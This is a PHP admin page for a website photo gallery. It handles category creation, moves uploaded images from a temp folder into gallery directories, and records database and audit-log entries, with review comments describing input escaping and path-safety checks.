Current File : /home/atfycaf/www/admin//galleryPhotoNew.php
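<?php
// Section id for this page. It is assigned before globalVars.php is loaded so that
// file can read it (presumably for the admin permission check; confirm there).
$thisCheckID	= 37;
// require, not include: a failed include only raises a warning and the page keeps
// running, so a missing or unreadable globalVars.php would let the upload handling
// below execute without whatever connection, session and access setup that file
// performs. require stops the request instead (fail closed).
require "globalVars.php";

include "header.php";
?>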

	<h2>Upload New Photos to the Gallery</h2>

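<?php
/*
 * Admin page: upload new photos to a gallery.
 *
 * POST "savedPhotos": optionally creates a new gallery category (pGalleryID 999999),
 *   then moves every photo recorded in photoGalleryTemp for this upload batch
 *   (uploadVar) from images/gallery/temp/ into the gallery's folder, records it in
 *   photoGallery, writes a userActions entry and prints a title field per photo.
 * Otherwise: prints the upload form (restricted to one gallery when "getGallery" is posted).
 *
 * Relies on names set up outside this block: $conn, $SERVER_ROOT, $Iurl, $badURL,
 * $goodURL, $adminID, $adminName, $adminEmail, cleanPost(), getRandID().
 *
 * NOTE(review): no anti-CSRF token is checked in this file; confirm that the shared
 * includes enforce one, because this page changes the database and the filesystem.
 * NOTE(review): the "or die (mysqli_error($conn))" calls print raw database errors
 * to the browser; consider logging them server-side instead.
 */

// HTML-escape a value for element and attribute context. double_encode is off so text
// that was already entity-encoded before storage is not encoded a second time.
$escHtml = static function ($value) {
	return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false);
};

if (isset($_POST["savedPhotos"])) {

	// Request values are untrusted. Gallery ids are numeric, so an integer cast makes
	// them safe for both the SQL below and the HTML attributes they are echoed into.
	$pGalleryID		= (isset($_POST["pGalleryID"]) && is_scalar($_POST["pGalleryID"])) ? (int) $_POST["pGalleryID"] : 0;
	$uploadVar		= (isset($_POST["uploadVar"]) && is_string($_POST["uploadVar"])) ? $_POST["uploadVar"] : "";
	if ($pGalleryID === 999999) {

		$catTitle	= cleanPost($_POST["catTitle"] ?? "", $conn);

		$pageURL	= str_replace($badURL, $goodURL, $catTitle);
		$pageURL	= strtolower($pageURL);
		// The slug becomes a directory name and part of a SQL LIKE pattern, so keep only
		// characters that cannot form a path separator, "..", a quote or a LIKE wildcard.
		$pageURL	= trim((string) preg_replace('/[^a-z0-9-]+/', '-', $pageURL), '-');
		if ($pageURL === '') {
			$pageURL = 'gallery';
		}

		$dupQuery = mysqli_query($conn, "SELECT id FROM photoGalleryCats WHERE pageURL LIKE '$pageURL%'");
		$isDup = $dupQuery ? mysqli_num_rows($dupQuery) : 0;
		if ($isDup > 0) {
			$pageURL .= "-". ($isDup + 1);
		}

		if(!is_dir($SERVER_ROOT  ."/images/gallery/$pageURL")) {
			mkdir($SERVER_ROOT   ."/images/gallery/$pageURL");
		}

		// mysqli_real_escape_string replaces addslashes: it honours the connection charset.
		$catTitleSQL = mysqli_real_escape_string($conn, (string) $catTitle);
		mysqli_query($conn, "INSERT INTO photoGalleryCats (pageURL, catTitle) VALUES ('$pageURL', '$catTitleSQL')") or die (mysqli_error($conn));
		$pGalleryID	= (int) mysqli_insert_id($conn);

		// The log text already carries HTML (&lt; ... &gt;), so it is presumably rendered
		// as HTML by the viewer; embedded values are HTML-escaped to avoid stored markup.
		$trackDate		= date("Y-m-d H:i:s");
		$adminIDSQL		= mysqli_real_escape_string($conn, (string) $adminID);
		$logDetails		= "The User ". $escHtml($adminName) ." &lt;". $escHtml($adminEmail) ."&gt; created the ". $escHtml($catTitle) ." photo gallery";
		$logDetailsSQL	= mysqli_real_escape_string($conn, $logDetails);
		mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminIDSQL', 'admin/galleryPhotoNew.html', 'photoGalleryCats', '$logDetailsSQL')");

	}

	// Look up the target gallery's folder name and title.
	$photoAlbum = null;
	$imageFolderQuery = mysqli_query($conn, "SELECT pageURL, catTitle FROM photoGalleryCats WHERE id = '$pGalleryID'");
	if ($imageFolderQuery) {
		while ($iFQ = mysqli_fetch_array($imageFolderQuery)) {
			$photoAlbum		= $iFQ["pageURL"];
			$catTitle		= $iFQ["catTitle"];
		}
	}

	// Without a matching gallery the original code moved files into the gallery root.
	// The folder must also be a single path segment so the moves stay inside it.
	$albumIsUsable = is_string($photoAlbum)
		&& basename($photoAlbum) === $photoAlbum
		&& !in_array($photoAlbum, ["", ".", ".."], true);

	if (!$albumIsUsable) {
		?>
	<p>The selected gallery could not be found. Please go back and choose a gallery category.</p>
		<?php
	} else {
		$albumDir = $SERVER_ROOT ."/images/gallery/". $photoAlbum;
		if(!is_dir($albumDir)) {
			mkdir($albumDir);
		}
		?>
	<p>Now you can give the uploaded photos a title. Click the Save button under the photo to save.</p>
	<div id="galleryLayout">
		<input type="hidden" id="galleryID" value="<?php echo $pGalleryID ?>">
		<?php
		$uploadVarSQL = mysqli_real_escape_string($conn, $uploadVar);
		$adminIDSQL   = mysqli_real_escape_string($conn, (string) $adminID);
		$photosQuery  = mysqli_query($conn, "SELECT * FROM photoGalleryTemp WHERE galleryID = '$uploadVarSQL'") or die (mysqli_error($conn));
		while ($pQ = mysqli_fetch_array($photosQuery)) {
			$imageID	= (int) $pQ["id"];
			// The stored file name is treated as data, not as a path: basename() drops any
			// directory part so the move cannot leave the temp or gallery folder.
			$imageURL	= basename((string) $pQ["imageURL"]);
			if ($imageURL === "" || $imageURL === "." || $imageURL === "..") {
				continue;
			}

			/////	MOVE PHOTOS TO RELEVANT DIRECTORY AND ADD TO DATABASE - THEN DISPLAY FOR TITLE ADDITION	\\\\\
			// "-title" / "-thumb" are inserted before the last four characters
			// (presumably a ".ext" suffix; this matches whatever naming the uploader used).
			$tempImageURL		= $SERVER_ROOT ."/images/gallery/temp/". $imageURL;
			$tempImageTitleURL	= substr_replace($tempImageURL, "-title", -4, 0);
			$tempImageTHURL		= substr_replace($tempImageURL, "-thumb", -4, 0);

			$newImageURL		= $albumDir ."/". $imageURL;
			$newImageTitleURL	= substr_replace($newImageURL, "-title", -4, 0);
			$newImageTHURL		= substr_replace($newImageURL, "-thumb", -4, 0);
			$imageSQL			= $photoAlbum ."/". $imageURL;

			// If the main file cannot be moved, leave the temp row in place rather than
			// recording a gallery photo that does not exist on disk.
			if (!is_file($tempImageURL) || !rename($tempImageURL, $newImageURL)) {
				continue;
			}
			if (is_file($tempImageTitleURL)) {
				rename($tempImageTitleURL, $newImageTitleURL);
			}
			if (is_file($tempImageTHURL)) {
				rename($tempImageTHURL, $newImageTHURL);
			}

			// Values read back from the database are escaped again before reuse in SQL.
			$imageSQLEsc = mysqli_real_escape_string($conn, $imageSQL);
			mysqli_query($conn, "DELETE FROM photoGalleryTemp WHERE id = '$imageID'");
			mysqli_query($conn, "INSERT INTO photoGallery (galleryID, imageURL) VALUES ('$pGalleryID', '$imageSQLEsc')");
			$newImageID		= (int) mysqli_insert_id($conn);

			$displayURL		= substr_replace($imageURL, "-thumb", -4, 0);

			$trackDate		= date("Y-m-d H:i:s");
			$imageHref		= $escHtml("/images/gallery/". $imageSQL);
			$logDetails		= "The User ". $escHtml($adminName) ." &lt;". $escHtml($adminEmail) ."&gt; added the photo <a href=\"". $imageHref ."\" target=\"_blank\">". $imageHref ."</a> to the ". $escHtml($catTitle) ." photo gallery";
			$logDetailsSQL	= mysqli_real_escape_string($conn, $logDetails);
			mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminIDSQL', 'admin/galleryPhotoNew.html', 'photoGalleryCats', '$logDetailsSQL')");
			?>
		<div class="galleryLayoutContainer">
			<div class="galleryLayoutBox">
				<div class="galleryLayoutPhoto"><img src="<?php echo $Iurl ?>gallery/<?php echo $escHtml($photoAlbum) ?>/<?php echo $escHtml($displayURL) ?>" width="300"></div>
				<div class="galleryLayoutTitle">
					<input type="text" id="photoTitle<?php echo $newImageID ?>" class="galleryPhotoTitle" placeholder="Photo Title" value="">
				</div>
				<button type="button" class="galleryLayoutSave" id="photoTitle<?php echo $newImageID ?>Save" data-pid="<?php echo $newImageID ?>" disabled>Save</button>
			</div>
		</div>
			<?php
		}
//		mysqli_query($conn, "TRUNCATE photoGalleryTemp");
		?>
	</div>

	<form action="galleryPhotoEdit.html" method="post">
		<input type="hidden" name="galleryID" value="<?php echo $pGalleryID ?>">
		<input type="submit" class="submitButton" name="getGallery" value="View Full Gallery" />
	</form>

		<?php
	}

} else {
	if (isset($_POST["getGallery"])) {
		// Untrusted request value: cast to int before it reaches HTML and SQL below.
		$pGalleryID		= (isset($_POST["galleryID"]) && is_scalar($_POST["galleryID"])) ? (int) $_POST["galleryID"] : 0;
		?>
	<form action="galleryPhotoEdit.html" method="post">
		<input type="hidden" name="galleryID" value="<?php echo $pGalleryID ?>">
		<input type="submit" class="submitButton" name="getGallery" value="View Existing Gallery" />
	</form>
		<?php
	}
	?>
    <form action="galleryPhotoNew.html" method="post">
		<input type="hidden" name="uploadVar" id="uploadVar" value="<?php echo getRandID(20) ?>">
		<div class="descStTab">
			<div class="pFormRow">
				<div class="pFormTitle">Gallery Category:</div>
				<div class="pFormSelect">
					<select name="pGalleryID" id="pGalleryID" required>
					<?php
					if (isset($_POST["getGallery"])) {
						// Only the gallery the admin came from is offered.
						$galleryCatsQuery = mysqli_query($conn, "SELECT * FROM photoGalleryCats WHERE id = '$pGalleryID'") or die (mysqli_error($conn));
						while ($gCQ = mysqli_fetch_array($galleryCatsQuery)) {
							$catID		= $gCQ["id"];
							$catTitle	= $gCQ["catTitle"];
							?>
							<option value="<?php echo $escHtml($catID) ?>"><?php echo $escHtml($catTitle) ?></option>
							<?php
						}
					} else {
						?>
						<option value="">Select</option>
						<?php
						$galleryCatsQuery = mysqli_query($conn, "SELECT * FROM photoGalleryCats ORDER BY catTitle ASC") or die (mysqli_error($conn));
						while ($gCQ = mysqli_fetch_array($galleryCatsQuery)) {
							$catID		= $gCQ["id"];
							$catTitle	= $gCQ["catTitle"];
							?>
							<option value="<?php echo $escHtml($catID) ?>"><?php echo $escHtml($catTitle) ?></option>
							<?php
						}
						?>
						<option value="999999">New Category</option>
						<?php
					}
					?>
					</select>
					<div class="pFormLabel">
						<label class="labelName">Gallery Category:</label>
					</div>
				</div>
			</div>
			<?php
			if (!isset($_POST["getGallery"])) {
				?>
			<div class="pFormRow" id="newCatRow">
				<div class="pFormTitle">New Category Title:</div>
				<div class="pFormInput">
					<input type="text" name="catTitle" size="50" />
					<div class="pFormLabel">
						<label class="labelName">New Category Title:</label>
					</div>
				</div>
			</div>
				<?php
			}
			?>
			<div id="uploadForm">
				<div class="pFormRow">
					<div class="pFormTitle">Add Photos:</div>
					<span class="btn btn-success fileinput-button">
						<span><strong>+</strong> Select photos...</span>
						<input id="fileupload" type="file" name="files[]" multiple accept="image/*">
					</span>
				</div>
				<div id="progress">
					<div class="bar" style="width: 0%;"></div>
				</div>
				<div id="status"></div>
				<ul id="galleryUpload"></ul>
			</div>
		</div>
		<input type="submit" class="submitButton" id="savedPhotos" name="savedPhotos" value="Save Photos &amp; Add Titles" disabled />
	</form>
	<div id="searchLoadingBG">
		<img src="images/searchLoading.gif" width="128" alt="Loading, Please wait..." title="Loading, Please wait...">
	</div>
	<?php
}
?>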

<?php
// Close the page with the shared admin footer template.
include 'footer.php';
?>
